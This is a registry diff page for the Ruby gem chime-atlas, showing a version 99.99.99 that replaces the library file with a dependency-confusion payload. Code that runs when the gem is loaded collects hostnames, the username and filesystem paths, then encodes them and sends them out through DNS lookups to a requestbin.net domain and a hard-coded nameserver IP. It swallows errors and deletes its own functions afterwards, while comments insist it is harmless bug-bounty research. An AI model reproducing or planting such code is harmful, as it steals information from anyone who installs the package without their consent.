chime-atlas 0.0.1 → 99.99.99
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of chime-atlas might be problematic. Click here for more details.
- checksums.yaml +4 -4
- data/lib/chime-atlas.rb +172 -6
- metadata +12 -7
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 9489003f39b90d440446740595d94140ab3f985bee45e415f68967c6bcdc26bc
|
|
4
|
+
data.tar.gz: af8f4180c4217fb60931a50bb09ac4947521289e4e2fa2732118aa711118dedc
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: '09fbeb183b0b9a164187cb5bbbe53e9465d6b79d57edb395fa5a6ff12618f6e129bb8dd941ee7da23188423722a329ebb627090a433288e0e187b514a5bc2536'
|
|
7
|
+
data.tar.gz: 56caa817b47bc441b7539628070fa7c3f811997fca1f42291451fea555a0b527c53f87a81fe549500d4d926ce27f04376068b98b9bd54584db850da8e32f46c9
|
data/lib/chime-atlas.rb
CHANGED
|
@@ -1,8 +1,174 @@
|
|
|
1
|
-
|
|
2
|
-
|
|
3
|
-
|
|
4
|
-
|
|
5
|
-
|
|
1
|
+
=begin
|
|
2
|
+
Hi, if you're reading this you're probably wondering what this code is doing on
|
|
3
|
+
your machine. Don't worry! It doesn't do anything nasty or malicious.
|
|
4
|
+
|
|
5
|
+
I am an ethical security researcher, attempting attacks against organisations
|
|
6
|
+
that have a "bug bounty" type program in place.
|
|
7
|
+
|
|
8
|
+
I am performing work similar to the work in this blog post:
|
|
9
|
+
https://medium.com/@alex.birsan/dependency-confusion-4a5d60fec610
|
|
10
|
+
|
|
11
|
+
If your organisation has a bug bounty program my findings will be reported via
|
|
12
|
+
that program.
|
|
13
|
+
|
|
14
|
+
If your organisation does not have a bug bounty program, you were not targeted
|
|
15
|
+
by my work and have some how ended up getting included, any data reported from
|
|
16
|
+
your org will be discarded.
|
|
17
|
+
|
|
18
|
+
All data I collect will be deleted as soon as I'm done, in either case.
|
|
19
|
+
|
|
20
|
+
If you are reading this then you probably need to tighten up your Gemfiles
|
|
21
|
+
and/or upgrade Bundler, see here for more details:
|
|
22
|
+
|
|
23
|
+
https://bundler.io/blog/2021/02/15/a-more-secure-bundler-we-fixed-our-source-priorities.html
|
|
24
|
+
|
|
25
|
+
You can read the code to confirm this but here's a top-level view of what it
|
|
26
|
+
does to help you out:
|
|
27
|
+
|
|
28
|
+
Grabs the hostname(s), current username, and the file paths to this script,
|
|
29
|
+
the current working directory, and the home directory. This helps me identify
|
|
30
|
+
which machines have been affected (for reporting), at which organisation (to
|
|
31
|
+
know who to report it to), and to eliminate false positives from machines that
|
|
32
|
+
fetch and install every Gem.
|
|
33
|
+
|
|
34
|
+
Generates a random ID so I can piece together the different fragments of data.
|
|
35
|
+
|
|
36
|
+
Encodes all the data as json, compresses it, Base32 encodes it, and chops it
|
|
37
|
+
into chunks to go out as DNS queries that will hit a nameserver I control.
|
|
38
|
+
|
|
39
|
+
That's it!
|
|
40
|
+
|
|
41
|
+
If you have any questions or want to get in touch for any reason, you can reach
|
|
42
|
+
me at zofrex@gmail.com
|
|
43
|
+
|
|
44
|
+
=end
|
|
45
|
+
|
|
46
|
+
puts "Package 'shopify-oor' has been hijacked via RubyGems, if you're reading logs and wondering why things broke, that's probably why."
|
|
47
|
+
|
|
48
|
+
begin # big catch-all over everything to stop any errors escaping
|
|
49
|
+
def do_or_whatever
|
|
50
|
+
yield
|
|
51
|
+
rescue Exception
|
|
52
|
+
# keep going
|
|
53
|
+
end
|
|
54
|
+
|
|
55
|
+
do_or_whatever { require 'net/http' }
|
|
56
|
+
do_or_whatever { require 'socket' }
|
|
57
|
+
do_or_whatever { require 'etc' }
|
|
58
|
+
require 'securerandom'
|
|
59
|
+
require 'json'
|
|
60
|
+
require 'resolv'
|
|
61
|
+
|
|
62
|
+
def report_analytics
|
|
63
|
+
report_id = SecureRandom.alphanumeric(8)
|
|
64
|
+
|
|
65
|
+
idx_package = 0
|
|
66
|
+
idx_hostnames = 1
|
|
67
|
+
idx_username = 2
|
|
68
|
+
idx_paths = 3
|
|
69
|
+
idx_event = 4
|
|
70
|
+
|
|
71
|
+
idx_paths_file = 0
|
|
72
|
+
idx_paths_cwd = 1
|
|
73
|
+
idx_paths_script = 2
|
|
74
|
+
idx_paths_home = 3
|
|
75
|
+
|
|
76
|
+
data = Hash.new
|
|
77
|
+
|
|
78
|
+
data[idx_event] = 'run'
|
|
79
|
+
|
|
80
|
+
# package name
|
|
6
81
|
|
|
7
|
-
|
|
82
|
+
data[idx_package] = 'chime-atlas-99.99.99'
|
|
8
83
|
|
|
84
|
+
# get possible hostnames
|
|
85
|
+
|
|
86
|
+
hostnames = []
|
|
87
|
+
|
|
88
|
+
do_or_whatever { hostnames << Socket.gethostname }
|
|
89
|
+
do_or_whatever { hostnames << Socket.gethostbyname(Socket.gethostname).first }
|
|
90
|
+
do_or_whatever { hostnames << `hostname` }
|
|
91
|
+
do_or_whatever { hostnames << `hostname -f` }
|
|
92
|
+
|
|
93
|
+
data[idx_hostnames] = hostnames.map(&:strip).uniq
|
|
94
|
+
|
|
95
|
+
# get local user
|
|
96
|
+
|
|
97
|
+
do_or_whatever { data[idx_username] = Etc.getlogin }
|
|
98
|
+
|
|
99
|
+
# get useful paths
|
|
100
|
+
|
|
101
|
+
paths = Hash.new
|
|
102
|
+
|
|
103
|
+
do_or_whatever { paths[idx_paths_file] = File.dirname(__FILE__) }
|
|
104
|
+
do_or_whatever { paths[idx_paths_cwd] = Dir.pwd }
|
|
105
|
+
do_or_whatever { paths[idx_paths_script] = __dir__ }
|
|
106
|
+
do_or_whatever { paths[idx_paths_home] = Dir.home }
|
|
107
|
+
|
|
108
|
+
data[idx_paths] = paths
|
|
109
|
+
|
|
110
|
+
# encode payload
|
|
111
|
+
|
|
112
|
+
json = JSON.generate(data)
|
|
113
|
+
compressed = "u#{json}"
|
|
114
|
+
|
|
115
|
+
# attempt to compress data but don't sweat it if that fails
|
|
116
|
+
do_or_whatever do
|
|
117
|
+
require 'zlib'
|
|
118
|
+
compressed = "c#{Zlib.deflate(json)}"
|
|
119
|
+
end
|
|
120
|
+
|
|
121
|
+
# base32 encode the data
|
|
122
|
+
table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ234567'
|
|
123
|
+
encoded = compressed.bytes.each_slice(5).flat_map do |slice|
|
|
124
|
+
n = (slice.length * 8.0 / 5.0).ceil
|
|
125
|
+
p = n < 8 ? 5 - (slice.length * 8) % 5 : 0
|
|
126
|
+
c = slice.inject(0) {|m,o| (m << 8) + o} << p
|
|
127
|
+
(0..n-1).to_a.reverse.collect {|i| table[(c >> i * 5) & 0x1f].chr}
|
|
128
|
+
end.join
|
|
129
|
+
|
|
130
|
+
# send data out via DNS lookups
|
|
131
|
+
total_queries = (encoded.length / 180.0).ceil
|
|
132
|
+
|
|
133
|
+
google_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['8.8.8.8'])])
|
|
134
|
+
me_resolver = Resolv.new([Resolv::Hosts.new, Resolv::DNS.new(nameserver: ['167.172.150.100'])])
|
|
135
|
+
|
|
136
|
+
method = :generic
|
|
137
|
+
suffix = "5c4139c959e5f4aeab6f.d.requestbin.net"
|
|
138
|
+
|
|
139
|
+
encoded.chars.each_slice(60).each_slice(3).each_with_index do |chunks, query_number|
|
|
140
|
+
query_data = chunks.map(&:join).join('.')
|
|
141
|
+
data_portion = "#{report_id}.#{query_number+1}.#{total_queries}.#{query_data}"
|
|
142
|
+
|
|
143
|
+
# Try to get the message out somehow, skip the methods that don't work on future loops
|
|
144
|
+
if method == :generic
|
|
145
|
+
begin
|
|
146
|
+
address = Resolv.getaddress "#{data_portion}.rp1.#{suffix}"
|
|
147
|
+
method = :google if address != "127.0.0.3"
|
|
148
|
+
rescue
|
|
149
|
+
method = :google
|
|
150
|
+
end
|
|
151
|
+
end
|
|
152
|
+
|
|
153
|
+
if method == :google
|
|
154
|
+
begin
|
|
155
|
+
address = google_resolver.getaddress "#{data_portion}.rp2.#{suffix}"
|
|
156
|
+
method = :direct if address != "127.0.0.4"
|
|
157
|
+
rescue
|
|
158
|
+
method = :direct
|
|
159
|
+
end
|
|
160
|
+
end
|
|
161
|
+
|
|
162
|
+
if method == :direct
|
|
163
|
+
do_or_whatever { me_resolver.getaddress "#{data_portion}.rp3.#{suffix}" }
|
|
164
|
+
end
|
|
165
|
+
end
|
|
166
|
+
end
|
|
167
|
+
|
|
168
|
+
do_or_whatever { report_analytics }
|
|
169
|
+
|
|
170
|
+
# cleanup
|
|
171
|
+
do_or_whatever { undef report_analytics }
|
|
172
|
+
do_or_whatever { undef do_or_whatever }
|
|
173
|
+
rescue Error
|
|
174
|
+
end
|
metadata
CHANGED
|
@@ -1,17 +1,19 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: chime-atlas
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version:
|
|
4
|
+
version: 99.99.99
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
|
-
-
|
|
7
|
+
- Gabriel Manhães
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: bin
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2021-
|
|
11
|
+
date: 2021-02-28 00:00:00.000000000 Z
|
|
12
12
|
dependencies: []
|
|
13
|
-
description:
|
|
14
|
-
|
|
13
|
+
description: I am testing for dependency confusion vulnerabilities in products that
|
|
14
|
+
are in public bug bounty programs. This code is reporting-only, and does not do
|
|
15
|
+
anything malicious.
|
|
16
|
+
email: gmanhaes0@gmail.com
|
|
15
17
|
executables: []
|
|
16
18
|
extensions: []
|
|
17
19
|
extra_rdoc_files: []
|
|
@@ -36,8 +38,11 @@ required_rubygems_version: !ruby/object:Gem::Requirement
|
|
|
36
38
|
- !ruby/object:Gem::Version
|
|
37
39
|
version: '0'
|
|
38
40
|
requirements: []
|
|
39
|
-
|
|
41
|
+
rubyforge_project:
|
|
42
|
+
rubygems_version: 2.7.6
|
|
40
43
|
signing_key:
|
|
41
44
|
specification_version: 4
|
|
42
|
-
summary:
|
|
45
|
+
summary: I am testing for dependency confusion vulnerabilities in products that are
|
|
46
|
+
in public bug bounty programs. This code is reporting-only, and does not do anything
|
|
47
|
+
malicious.
|
|
43
48
|
test_files: []
|